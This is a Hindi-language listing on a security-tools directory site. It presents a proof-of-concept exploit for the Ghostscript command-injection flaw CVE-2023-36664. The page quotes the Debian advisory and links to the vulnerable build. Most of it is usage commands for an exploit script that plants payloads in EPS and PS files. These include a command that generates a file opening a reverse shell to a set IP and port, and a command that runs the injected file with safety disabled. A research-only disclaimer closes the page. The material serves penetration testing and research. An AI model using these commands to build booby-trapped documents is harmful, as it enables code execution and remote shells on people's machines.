Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-36664-Ghostscript-command-injection — Ghostscript कमांड इंजेक्शन भेद्यता PoC (CVE-2023-36664) | Kitploit
उपकरण/GitHubGitHub/jakabakos/cve-2023-36664-ghostscript-command-injection
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेपर और शोधलर्निंग और शिक्षा
GitHubjakabakos/cve-2023-36664-ghostscript-command-injection

CVE-2023-36664-Ghostscript-command-injection

Ghostscript कमांड इंजेक्शन भेद्यता PoC (CVE-2023-36664)

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
1301613 साल पहलेKitploit द्वारा समीक्षित
साझा करें

Ghostscript कमांड इंजेक्शन भेद्यता PoC (CVE-2023-36664)

Ghostscript के संस्करण 10.01.2 से पहले में खोजी गई भेद्यता कोड निष्पादन की ओर ले जाती है (CVSS स्कोर 9.8)।

आधिकारिक भेद्यता विवरण:

Artifex Ghostscript 10.01.2 तक पाइप डिवाइसों के लिए अनुमति सत्यापन को गलत तरीके से संभालता है (%pipe% उपसर्ग या | पाइप वर्ण उपसर्ग के साथ)।

Debian ने एक सुरक्षा सलाह जारी की जिसमें मनमाने कमांडों के संभावित निष्पादन का उल्लेख किया गया:

"यह पाया गया कि Ghostscript, GPL PostScript/PDF इंटरप्रेटर, पाइप डिवाइसों के लिए अनुमति सत्यापन को ठीक से संभाल नहीं पाता, जिसके परिणामस्वरूप यदि दोषपूर्ण दस्तावेज़ फ़ाइलें संसाधित की जाती हैं तो मनमाने कमांडों का निष्पादन हो सकता है।"

यह रेपो vsociety ब्लॉग पर उपलब्ध CVE विश्लेषण ब्लॉग पोस्ट के लिए बनाया गया है।

शोषण

Ghostscript 10.01.1 यहाँ डाउनलोड करें: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs10011 Windows x64 निष्पादन योग्य का सीधा लिंक: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10011/gs10011w64.exe

PS या EPS फ़ाइल खोलने पर शोषण हो सकता है और यह कोड निष्पादन की अनुमति दे सकता है, जो पाइप डिवाइसों के लिए अनुमति सत्यापन को गलत तरीके से संभालने के कारण होता है।

उपयोग: python3 CVE_2023_36664_exploit.py <input_file> <command>

उदाहरण:

root@kitploit:~
python3 CVE_2023_36664_exploit.py file.eps "calc"

यह file_injected.eps नामक एक नई फ़ाइल उत्पन्न करता है।

कैलकुलेटर को ट्रिगर करने के लिए इसे Ghostscript के साथ खोलें (संस्करण 9.50 से आपको -dNOSAFER विकल्प का भी उपयोग करना होगा):

root@kitploit:~
gs10011w64.exe -dNOSAFER .\file_injected.eps
प्रमाण

अन्य उदाहरण: Windows पर एक नया कैलकुलेटर खोलने वाले पेलोड "calc" के साथ run_calculator.eps नामक एक नई EPS फ़ाइल उत्पन्न करें

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --payload calc --filename run_calculator --extension eps

कस्टम IP के साथ rev_shell.eps नामक एक नई EPS फ़ाइल उत्पन्न करें (Unix पर ट्रिगर होने पर रिवर्स शेल प्रारंभ करें)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.10.10 -port 4242 --filename trigger_revshell --extension eps

पेलोड "calc" के साथ malicius.ps नामक एक नई PS फ़ाइल उत्पन्न करें (Windows पर एक नया कैलकुलेटर खोलता है)

root@kitploit:~
python3 CVE_2023_36664_exploit.py -g -p "calc" -x ps

file.eps नामक मौजूदा फ़ाइल में दुर्भावनापूर्ण कस्टम पेलोड ("calc") इंजेक्ट करें (Windows पर एक नया कैलकुलेटर खोलता है)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --inject --payload "calc" --filename file.eps

अस्वीकरण

यह सॉफ़्टवेयर पूरी तरह से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्य से बनाया गया है, और इसका उद्देश्य स्पष्ट रूप से अधिकृत स्थानों को छोड़कर सिस्टम पर हमला करने के लिए उपयोग करना नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। ज़िम्मेदारी से उपयोग करें।

टूल डाउनलोड करें